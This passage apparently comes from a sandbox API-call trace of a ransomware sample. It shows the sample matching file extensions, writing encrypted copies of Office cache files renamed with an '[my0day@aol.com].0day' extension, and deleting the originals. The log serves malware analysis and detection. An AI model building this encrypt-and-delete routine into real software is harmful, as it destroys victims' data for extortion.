1 [0034.678] lstrlenW (lpString=".rar") returned 4 [0034.678] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString=".bz2") returned 4 [0034.678] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString=".7z") returned 3 [0034.678] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.678] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.678] lstrlenW (lpString=".dbf") returned 4 [0034.678] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.678] lstrlenW (lpString=".1cd") returned 4 [0034.678] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.678] lstrlenW (lpString=".jpg") returned 4 [0034.678] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.678] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.679] lstrlenW (lpString="Setup.xml") returned 9 [0034.679] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.679] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1988) returned 1 [0034.679] CloseHandle (hObject=0x170) returned 1 [0034.679] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.680] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.680] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.680] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.680] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.680] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.680] GetLastError () returned 0x0 [0034.680] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0034.681] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0034.682] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.682] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.682] SetEndOfFile (hFile=0x18c) returned 1 [0034.683] CloseHandle (hObject=0x18c) returned 1 [0034.683] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.683] SetEndOfFile (hFile=0x170) returned 1 [0034.684] CloseHandle (hObject=0x170) returned 1 [0034.684] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.684] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.684] lstrlenW (lpString=".doc") returned 4 [0034.685] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".docx") returned 5 [0034.685] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.685] lstrlenW (lpString=".pdf") returned 4 [0034.685] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".xls") returned 4 [0034.685] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".xlsx") returned 5 [0034.685] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.685] lstrlenW (lpString=".ppt") returned 4 [0034.685] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString=".zip") returned 4 [0034.685] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.685] lstrlenW (lpString=".rar") returned 4 [0034.685] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".bz2") returned 4 [0034.685] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".7z") returned 3 [0034.685] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString=".dbf") returned 4 [0034.685] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString=".1cd") returned 4 [0034.685] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString=".jpg") returned 4 [0034.685] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.685] lstrlenW (lpString=".doc") returned 4 [0034.685] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.685] lstrlenW (lpString=".docx") returned 5 [0034.685] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.686] lstrlenW (lpString=".pdf") returned 4 [0034.686] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString=".xls") returned 4 [0034.686] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString=".xlsx") returned 5 [0034.686] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.686] lstrlenW (lpString=".ppt") returned 4 [0034.686] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.686] lstrlenW (lpString=".zip") returned 4 [0034.686] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.686] lstrlenW (lpString=".rar") returned 4 [0034.686] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString=".bz2") returned 4 [0034.686] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString=".7z") returned 3 [0034.686] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.686] lstrlenW (lpString=".dbf") returned 4 [0034.686] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.686] lstrlenW (lpString=".1cd") returned 4 [0034.686] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.686] lstrlenW (lpString=".jpg") returned 4 [0034.686] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.686] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.686] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0034.686] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.688] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1452) returned 1 [0034.688] CloseHandle (hObject=0x170) returned 1 [0034.688] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0034.688] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.688] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.688] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.688] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.688] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.689] GetLastError () returned 0x0 [0034.689] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0034.690] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.691] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.691] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.691] SetEndOfFile (hFile=0x18c) returned 1 [0034.691] CloseHandle (hObject=0x18c) returned 1 [0034.692] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.692] SetEndOfFile (hFile=0x170) returned 1 [0034.692] CloseHandle (hObject=0x170) returned 1 [0034.692] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.693] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0034.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.693] lstrlenW (lpString=".doc") returned 4 [0034.693] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString=".docx") returned 5 [0034.693] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.693] lstrlenW (lpString=".pdf") returned 4 [0034.693] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString=".xls") returned 4 [0034.693] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString=".xlsx") returned 5 [0034.693] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.693] lstrlenW (lpString=".ppt") returned 4 [0034.693] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.693] lstrlenW (lpString=".zip") returned 4 [0034.693] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.693] lstrlenW (lpString=".rar") returned 4 [0034.693] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString=".bz2") returned 4 [0034.693] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.693] lstrlenW (lpString=".7z") returned 3 [0034.693] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".dbf") returned 4 [0034.694] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".1cd") returned 4 [0034.694] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".jpg") returned 4 [0034.694] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".doc") returned 4 [0034.694] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString=".docx") returned 5 [0034.694] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.694] lstrlenW (lpString=".pdf") returned 4 [0034.694] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString=".xls") returned 4 [0034.694] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString=".xlsx") returned 5 [0034.694] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.694] lstrlenW (lpString=".ppt") returned 4 [0034.694] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".zip") returned 4 [0034.694] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.694] lstrlenW (lpString=".rar") returned 4 [0034.694] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString=".bz2") returned 4 [0034.694] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.694] lstrlenW (lpString=".7z") returned 3 [0034.694] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.694] lstrlenW (lpString=".dbf") returned 4 [0034.694] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.695] lstrlenW (lpString=".1cd") returned 4 [0034.695] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.695] lstrlenW (lpString=".jpg") returned 4 [0034.695] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.695] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.695] lstrlenW (lpString="Setup.xml") returned 9 [0034.695] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.695] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1872) returned 1 [0034.695] CloseHandle (hObject=0x170) returned 1 [0034.695] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.695] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.695] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.695] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.696] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.696] GetLastError () returned 0x0 [0034.696] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x750, lpOverlapped=0x0) returned 1 [0034.956] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x760, lpOverlapped=0x0) returned 1 [0035.614] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.614] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.614] SetEndOfFile (hFile=0x18c) returned 1 [0035.614] CloseHandle (hObject=0x18c) returned 1 [0035.615] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.615] SetEndOfFile (hFile=0x170) returned 1 [0035.616] CloseHandle (hObject=0x170) returned 1 [0035.616] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.616] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.616] lstrlenW (lpString=".doc") returned 4 [0035.616] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.616] lstrlenW (lpString=".docx") returned 5 [0035.617] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.617] lstrlenW (lpString=".pdf") returned 4 [0035.617] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".xls") returned 4 [0035.617] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".xlsx") returned 5 [0035.617] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.617] lstrlenW (lpString=".ppt") returned 4 [0035.617] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString=".zip") returned 4 [0035.617] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.617] lstrlenW (lpString=".rar") returned 4 [0035.617] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".bz2") returned 4 [0035.617] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".7z") returned 3 [0035.617] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString=".dbf") returned 4 [0035.617] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString=".1cd") returned 4 [0035.617] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString=".jpg") returned 4 [0035.617] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.617] lstrlenW (lpString=".doc") returned 4 [0035.617] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".docx") returned 5 [0035.617] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.617] lstrlenW (lpString=".pdf") returned 4 [0035.618] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString=".xls") returned 4 [0035.618] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString=".xlsx") returned 5 [0035.618] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.618] lstrlenW (lpString=".ppt") returned 4 [0035.618] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.618] lstrlenW 